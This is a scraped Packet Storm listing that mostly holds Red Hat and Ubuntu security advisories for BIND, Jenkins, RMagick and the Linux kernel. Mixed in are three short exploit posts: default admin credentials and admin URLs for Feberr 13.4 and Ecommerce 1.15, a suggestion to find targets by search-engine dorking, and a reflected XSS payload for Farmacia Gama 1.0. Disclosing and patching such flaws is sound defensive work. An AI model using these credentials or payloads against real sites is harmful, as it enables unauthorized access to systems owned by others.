Red Hat Security Advisory 2024-5418-03 - An update for bind9.16 is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5418.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: bind9.16 security updateAdvisory ID:        RHSA-2024:5418-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5418Issue date:         2024-08-15Revision:           03CVE Names:          CVE-2024-1737====================================================================Summary: An update for bind9.16 is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.Security Fix(es):* bind: bind9: BIND's database will be slow if a very large number of RRs exist at the same nam (CVE-2024-1737)* bind9: bind: SIG(0) can be used to exhaust CPU resources (CVE-2024-1975)* bind: bind9: Assertion failure when serving both stale cache data and authoritative zone content (CVE-2024-4076)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-1737References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2298893https://bugzilla.redhat.com/show_bug.cgi?id=2298901https://bugzilla.redhat.com/show_bug.cgi?id=2298904

Red Hat Security Advisory 2024-5418-03

Red Hat Security Advisory 2024-5411-03 - An update for OpenShift Jenkins is now available for Red Hat Product OCP Tools 4.14. Red Hat Product Security has rated this update as having a security impact of critical. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5411.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Critical: Red Hat Product OCP Tools 4.14 OpenShift Jenkins security updateAdvisory ID:        RHSA-2024:5411-03Product:            OpenShift JenkinsAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5411Issue date:         2024-08-15Revision:           03CVE Names:          CVE-2024-43044====================================================================Summary: An update for OpenShift Jenkins is now available for Red Hat Product OCP Tools 4.14.Red Hat Product Security has rated this update as having a security impact of critical.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating,is available for each vulnerability from the CVE link(s) in the References section.Description:Jenkins is a continuous integration server that monitors executions of repeated jobs, such as building a software project or jobs run by cron.Security Fix(es):* jenkins: Arbitrary file read vulnerability through agent connections can leadto RCE (CVE-2024-43044)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-43044References:https://access.redhat.com/security/updates/classification/#criticalhttps://bugzilla.redhat.com/show_bug.cgi?id=2136374https://bugzilla.redhat.com/show_bug.cgi?id=2136386https://bugzilla.redhat.com/show_bug.cgi?id=2136388https://bugzilla.redhat.com/show_bug.cgi?id=2145194https://bugzilla.redhat.com/show_bug.cgi?id=2303466https://issues.redhat.com/browse/JKNS-271https://issues.redhat.com/browse/JKNS-289https://issues.redhat.com/browse/JKNS-337https://issues.redhat.com/browse/JKNS-344https://issues.redhat.com/browse/JKNS-345https://issues.redhat.com/browse/JKNS-397https://issues.redhat.com/browse/JKNS-398https://issues.redhat.com/browse/OCPBUGS-11158https://issues.redhat.com/browse/OCPBUGS-11253https://issues.redhat.com/browse/OCPBUGS-11254https://issues.redhat.com/browse/OCPBUGS-11446https://issues.redhat.com/browse/OCPBUGS-1357https://issues.redhat.com/browse/OCPBUGS-13869https://issues.redhat.com/browse/OCPBUGS-14111https://issues.redhat.com/browse/OCPBUGS-14609https://issues.redhat.com/browse/OCPBUGS-15646https://issues.redhat.com/browse/OCPBUGS-15902https://issues.redhat.com/browse/OCPBUGS-1709https://issues.redhat.com/browse/OCPBUGS-1942https://issues.redhat.com/browse/OCPBUGS-2099https://issues.redhat.com/browse/OCPBUGS-2184https://issues.redhat.com/browse/OCPBUGS-2318https://issues.redhat.com/browse/OCPBUGS-23438https://issues.redhat.com/browse/OCPBUGS-27388https://issues.redhat.com/browse/OCPBUGS-28961https://issues.redhat.com/browse/OCPBUGS-655https://issues.redhat.com/browse/OCPBUGS-6579https://issues.redhat.com/browse/OCPBUGS-6870https://issues.redhat.com/browse/OCPBUGS-710https://issues.redhat.com/browse/OCPBUGS-8377https://issues.redhat.com/browse/OCPBUGS-8442https://issues.redhat.com/browse/OCPTOOLS-244

Red Hat Security Advisory 2024-5411-03

Feberr version 13.4 suffers from an ignored default credential vulnerability.

**Feberr 13.4 Insecure Settings**

Posted Aug 15, 2024

Authored by indoushka

Feberr version 13.4 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 2e393c441ce609493774dac1c3e5f681c5ce98d1b3702bb114041fdb03335768

Download | Favorite | View

**Feberr 13.4 Insecure Settings**

    ====================================================================================================================================| # Title     : Feberr v13.4 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.codester.com/items/14224/feberr-multivendor-digital-products-marketplace                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user&pass: admin[+] https://www/127.0.0.1/nexuscriptscom/admin/pwa-settingsGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,419)
*   Arbitrary (16,881)
*   BBS (2,859)
*   Bypass (1,863)
*   CGI (1,033)
*   Code Execution (7,815)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,084)
*   Encryption (2,389)
*   Exploit (53,208)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (896)
*   Kernel (7,222)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,659)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,275)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,277)
*   SQL Injection (16,610)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,994)
*   Web (9,965)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,257)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,775)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,536)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,750)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Feberr 13.4 Insecure Settings

Red Hat Security Advisory 2024-5410-03 - An update for OpenShift Jenkins is now available for Red Hat Product OCP Tools 4.12. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5410.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Critical: Red Hat Product OCP Tools 4.12 OpenShift Jenkins security updateAdvisory ID:        RHSA-2024:5410-03Product:            OpenShift JenkinsAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5410Issue date:         2024-08-15Revision:           03CVE Names:          CVE-2024-43044====================================================================Summary: An update for OpenShift Jenkins is now available for Red Hat Product OCP Tools 4.12.Red Hat Product Security has rated this update as having a security impact of Critical.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Jenkins is a continuous integration server that monitors executions of repeated jobs, such as building a software project or jobs run by cron.Security Fix(es):* jenkins: Arbitrary file read vulnerability through agent connections can lead to RCE (CVE-2024-43044)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-43044References:https://access.redhat.com/security/updates/classification/#criticalhttps://bugzilla.redhat.com/show_bug.cgi?id=2303466

Red Hat Security Advisory 2024-5410-03

Ubuntu Security Notice 6960-1 - Nick Browning discovered that RMagick incorrectly handled memory under certain operations. An attacker could possibly use this issue to cause a denial of service through memory exhaustion.

==========================================================================

Ubuntu Security Notice USN-6960-1  
August 14, 2024

ruby-rmagick vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

RMagick could be made to crash if it received specially crafted input.

Software Description:  
- ruby-rmagick: Ruby Bindings for ImageMagick

Details:

Nick Browning discovered that RMagick incorrectly handled memory  
under certain operations. An attacker could possibly  
use this issue to cause a denial of service through memory exhaustion.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
   ruby-rmagick                    4.2.3-2ubuntu0.22.04.1~esm2  
                                   Available with Ubuntu Pro

Ubuntu 20.04 LTS  
   ruby-rmagick                    2.16.0-6ubuntu0.1

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6960-1   
<https://ubuntu.com/security/notices/USN-6960-1>  
   CVE-2023-5349

Package Information:  
https://launchpad.net/ubuntu/+source/ruby-rmagick/2.16.0-6ubuntu0.1   
<https://launchpad.net/ubuntu/+source/ruby-rmagick/2.16.0-6ubuntu0.1>

Ubuntu Security Notice USN-6960-1

Farmacia Gama version 1.0 suffers from a cross site scripting vulnerability.

**Farmacia Gama 1.0 Cross Site Scripting**

Posted Aug 15, 2024

Authored by indoushka

Farmacia Gama version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 2caf36ad25ddb5e5fcd4a26fd8ac2e62e0dee3d76fbd95e698130d2b8730632e

Download | Favorite | View

**Farmacia Gama 1.0 Cross Site Scripting**

    =============================================================================================================================================| # Title     : Farmacia Gama v1.0 XSS Vulnerability                                                                                        || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /main.php?notaFiscal=333962'"()%26%25<acx><ScRiPt >prompt(926815)</ScRiPt>&pg=vendas[+] http://127.0.0.1/farmacia-master/main.php?notaFiscal=333962'"()%26%25<acx><ScRiPt >prompt(926815)</ScRiPt>&pg=vendasGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,419)
*   Arbitrary (16,881)
*   BBS (2,859)
*   Bypass (1,863)
*   CGI (1,033)
*   Code Execution (7,815)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,084)
*   Encryption (2,389)
*   Exploit (53,208)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (896)
*   Kernel (7,222)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,659)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,275)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,277)
*   SQL Injection (16,610)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,994)
*   Web (9,965)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,257)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,775)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,536)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,750)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Farmacia Gama 1.0 Cross Site Scripting

Red Hat Security Advisory 2024-5406-03 - An update for OpenShift Jenkins is now available for Red Hat Product OCP Tools 4.13. Red Hat Product Security has rated this update as having a security impact of critical. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5406.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Critical: Red Hat Product OCP Tools 4.13 OpenShift Jenkins security updateAdvisory ID:        RHSA-2024:5406-03Product:            OpenShift JenkinsAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5406Issue date:         2024-08-15Revision:           03CVE Names:          CVE-2024-43044====================================================================Summary: An update for OpenShift Jenkins is now available for Red Hat Product OCP Tools 4.13.Red Hat Product Security has rated this update as having a security impact of critical.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating,is available for each vulnerability from the CVE link(s) in the References section.Description:Jenkins is a continuous integration server that monitors executions of repeated jobs, such as building a software project or jobs run by cron.Security Fix(es):* jenkins: Arbitrary file read vulnerability through agent connections can lead to RCE (CVE-2024-43044)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-43044References:https://access.redhat.com/security/updates/classification/#criticalhttps://bugzilla.redhat.com/show_bug.cgi?id=2136374https://bugzilla.redhat.com/show_bug.cgi?id=2136386https://bugzilla.redhat.com/show_bug.cgi?id=2136388https://bugzilla.redhat.com/show_bug.cgi?id=2145194https://bugzilla.redhat.com/show_bug.cgi?id=2303466https://issues.redhat.com/browse/JKNS-271https://issues.redhat.com/browse/JKNS-289https://issues.redhat.com/browse/JKNS-397https://issues.redhat.com/browse/JKNS-398https://issues.redhat.com/browse/OCPBUGS-10934https://issues.redhat.com/browse/OCPBUGS-11158https://issues.redhat.com/browse/OCPBUGS-11329https://issues.redhat.com/browse/OCPBUGS-11446https://issues.redhat.com/browse/OCPBUGS-11452https://issues.redhat.com/browse/OCPBUGS-1357https://issues.redhat.com/browse/OCPBUGS-13651https://issues.redhat.com/browse/OCPBUGS-13870https://issues.redhat.com/browse/OCPBUGS-14112https://issues.redhat.com/browse/OCPBUGS-14311https://issues.redhat.com/browse/OCPBUGS-14634https://issues.redhat.com/browse/OCPBUGS-15647https://issues.redhat.com/browse/OCPBUGS-15986https://issues.redhat.com/browse/OCPBUGS-1709https://issues.redhat.com/browse/OCPBUGS-1942https://issues.redhat.com/browse/OCPBUGS-2099https://issues.redhat.com/browse/OCPBUGS-2184https://issues.redhat.com/browse/OCPBUGS-2318https://issues.redhat.com/browse/OCPBUGS-27389https://issues.redhat.com/browse/OCPBUGS-28962https://issues.redhat.com/browse/OCPBUGS-655https://issues.redhat.com/browse/OCPBUGS-6579https://issues.redhat.com/browse/OCPBUGS-6870https://issues.redhat.com/browse/OCPBUGS-710https://issues.redhat.com/browse/OCPBUGS-8377https://issues.redhat.com/browse/OCPBUGS-8442https://issues.redhat.com/browse/OCPTOOLS-245

Red Hat Security Advisory 2024-5406-03

Ecommerce version 1.15 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Ecommerce 1.15 Insecure Settings Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   || # Vendor    : https://demo.phpscriptpoint.com/ecommerce                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 1234[+] https://www/127.0.0.1/demo/phpscriptpoint.com/ecommerce/adminGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Ecommerce 1.15 Insecure Settings

Red Hat Security Advisory 2024-5405-03 - An update for OpenShift Jenkins is now available for Red Hat Product OCP Tools 4.15. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5405.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Critical: Red Hat Product OCP Tools 4.15 OpenShift Jenkins security updateAdvisory ID:        RHSA-2024:5405-03Product:            OpenShift JenkinsAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5405Issue date:         2024-08-15Revision:           03CVE Names:          CVE-2024-43044====================================================================Summary: An update for OpenShift Jenkins is now available for Red Hat Product OCP Tools 4.15.Red Hat Product Security has rated this update as having a security impact of Critical.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Jenkins is a continuous integration server that monitors executions of repeated jobs, such as building a software project or jobs run by cron.Security Fix(es):* jenkins: Arbitrary file read vulnerability through agent connections can lead to RCE (CVE-2024-43044)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-43044References:https://access.redhat.com/security/updates/classification/#criticalhttps://bugzilla.redhat.com/show_bug.cgi?id=2303466

Red Hat Security Advisory 2024-5405-03

Ubuntu Security Notice 6951-2 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6951-2August 14, 2024linux-azure vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure: Linux kernel for Microsoft Azure Cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM64 architecture;   - M68K architecture;   - User-Mode Linux (UML);   - x86 architecture;   - Accessibility subsystem;   - Character device driver;   - Clock framework and drivers;   - CPU frequency scaling framework;   - Hardware crypto device drivers;   - Buffer Sharing and Synchronization framework;   - FireWire subsystem;   - GPU drivers;   - HW tracing;   - Macintosh device drivers;   - Multiple devices driver;   - Media drivers;   - Network drivers;   - Pin controllers subsystem;   - S/390 drivers;   - SCSI drivers;   - SoundWire subsystem;   - Greybus lights staging drivers;   - TTY drivers;   - Framebuffer layer;   - Virtio drivers;   - 9P distributed file system;   - eCrypt file system;   - EROFS file system;   - Ext4 file system;   - F2FS file system;   - JFFS2 file system;   - Network file system client;   - NILFS2 file system;   - SMB network file system;   - Kernel debugger infrastructure;   - IRQ subsystem;   - Tracing infrastructure;   - Dynamic debug library;   - 9P file system network protocol;   - Bluetooth subsystem;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Netfilter;   - NET/ROM layer;   - NFC subsystem;   - NSH protocol;   - Open vSwitch;   - Phonet protocol;   - TIPC protocol;   - Unix domain sockets;   - Wireless networking;   - eXpress Data Path;   - XFRM subsystem;   - ALSA framework;(CVE-2024-36934, CVE-2024-38578, CVE-2024-38600, CVE-2024-27399,CVE-2024-39276, CVE-2024-38596, CVE-2024-36933, CVE-2024-36919,CVE-2024-35976, CVE-2024-37356, CVE-2023-52585, CVE-2024-38558,CVE-2024-38560, CVE-2024-38634, CVE-2024-36959, CVE-2024-38633,CVE-2024-36886, CVE-2024-27398, CVE-2024-39493, CVE-2024-26886,CVE-2024-31076, CVE-2024-38559, CVE-2024-38615, CVE-2024-36971,CVE-2024-38627, CVE-2024-36964, CVE-2024-38780, CVE-2024-37353,CVE-2024-38621, CVE-2024-36883, CVE-2024-39488, CVE-2024-38661,CVE-2024-36939, CVE-2024-38589, CVE-2024-38565, CVE-2024-38381,CVE-2024-35947, CVE-2024-36905, CVE-2022-48772, CVE-2024-36017,CVE-2024-36946, CVE-2024-27401, CVE-2024-38579, CVE-2024-38612,CVE-2024-38598, CVE-2024-38635, CVE-2024-38587, CVE-2024-38567,CVE-2024-38549, CVE-2024-36960, CVE-2023-52752, CVE-2024-27019,CVE-2024-38601, CVE-2024-39489, CVE-2024-39467, CVE-2023-52882,CVE-2024-38583, CVE-2024-39480, CVE-2024-38607, CVE-2024-36940,CVE-2024-38659, CVE-2023-52434, CVE-2024-36015, CVE-2024-38582,CVE-2024-36950, CVE-2024-38552, CVE-2024-33621, CVE-2024-36954,CVE-2024-39475, CVE-2024-39301, CVE-2024-38599, CVE-2024-36902,CVE-2024-36286, CVE-2024-38613, CVE-2024-38637, CVE-2024-36941,CVE-2024-36014, CVE-2024-38618, CVE-2024-36904, CVE-2024-36270,CVE-2024-39292, CVE-2024-39471, CVE-2022-48674)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS   linux-image-5.4.0-1135-azure    5.4.0-1135.142   linux-image-azure-lts-20.04     5.4.0.1135.129After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6951-2   https://ubuntu.com/security/notices/USN-6951-1   CVE-2022-48674, CVE-2022-48772, CVE-2023-52434, CVE-2023-52585,   CVE-2023-52752, CVE-2023-52882, CVE-2024-26886, CVE-2024-27019,   CVE-2024-27398, CVE-2024-27399, CVE-2024-27401, CVE-2024-31076,   CVE-2024-33621, CVE-2024-35947, CVE-2024-35976, CVE-2024-36014,   CVE-2024-36015, CVE-2024-36017, CVE-2024-36270, CVE-2024-36286,   CVE-2024-36883, CVE-2024-36886, CVE-2024-36902, CVE-2024-36904,   CVE-2024-36905, CVE-2024-36919, CVE-2024-36933, CVE-2024-36934,   CVE-2024-36939, CVE-2024-36940, CVE-2024-36941, CVE-2024-36946,   CVE-2024-36950, CVE-2024-36954, CVE-2024-36959, CVE-2024-36960,   CVE-2024-36964, CVE-2024-36971, CVE-2024-37353, CVE-2024-37356,   CVE-2024-38381, CVE-2024-38549, CVE-2024-38552, CVE-2024-38558,   CVE-2024-38559, CVE-2024-38560, CVE-2024-38565, CVE-2024-38567,   CVE-2024-38578, CVE-2024-38579, CVE-2024-38582, CVE-2024-38583,   CVE-2024-38587, CVE-2024-38589, CVE-2024-38596, CVE-2024-38598,   CVE-2024-38599, CVE-2024-38600, CVE-2024-38601, CVE-2024-38607,   CVE-2024-38612, CVE-2024-38613, CVE-2024-38615, CVE-2024-38618,   CVE-2024-38621, CVE-2024-38627, CVE-2024-38633, CVE-2024-38634,   CVE-2024-38635, CVE-2024-38637, CVE-2024-38659, CVE-2024-38661,   CVE-2024-38780, CVE-2024-39276, CVE-2024-39292, CVE-2024-39301,   CVE-2024-39467, CVE-2024-39471, CVE-2024-39475, CVE-2024-39480,   CVE-2024-39488, CVE-2024-39489, CVE-2024-39493Package Information:   https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1135.142

Tag

#vulnerability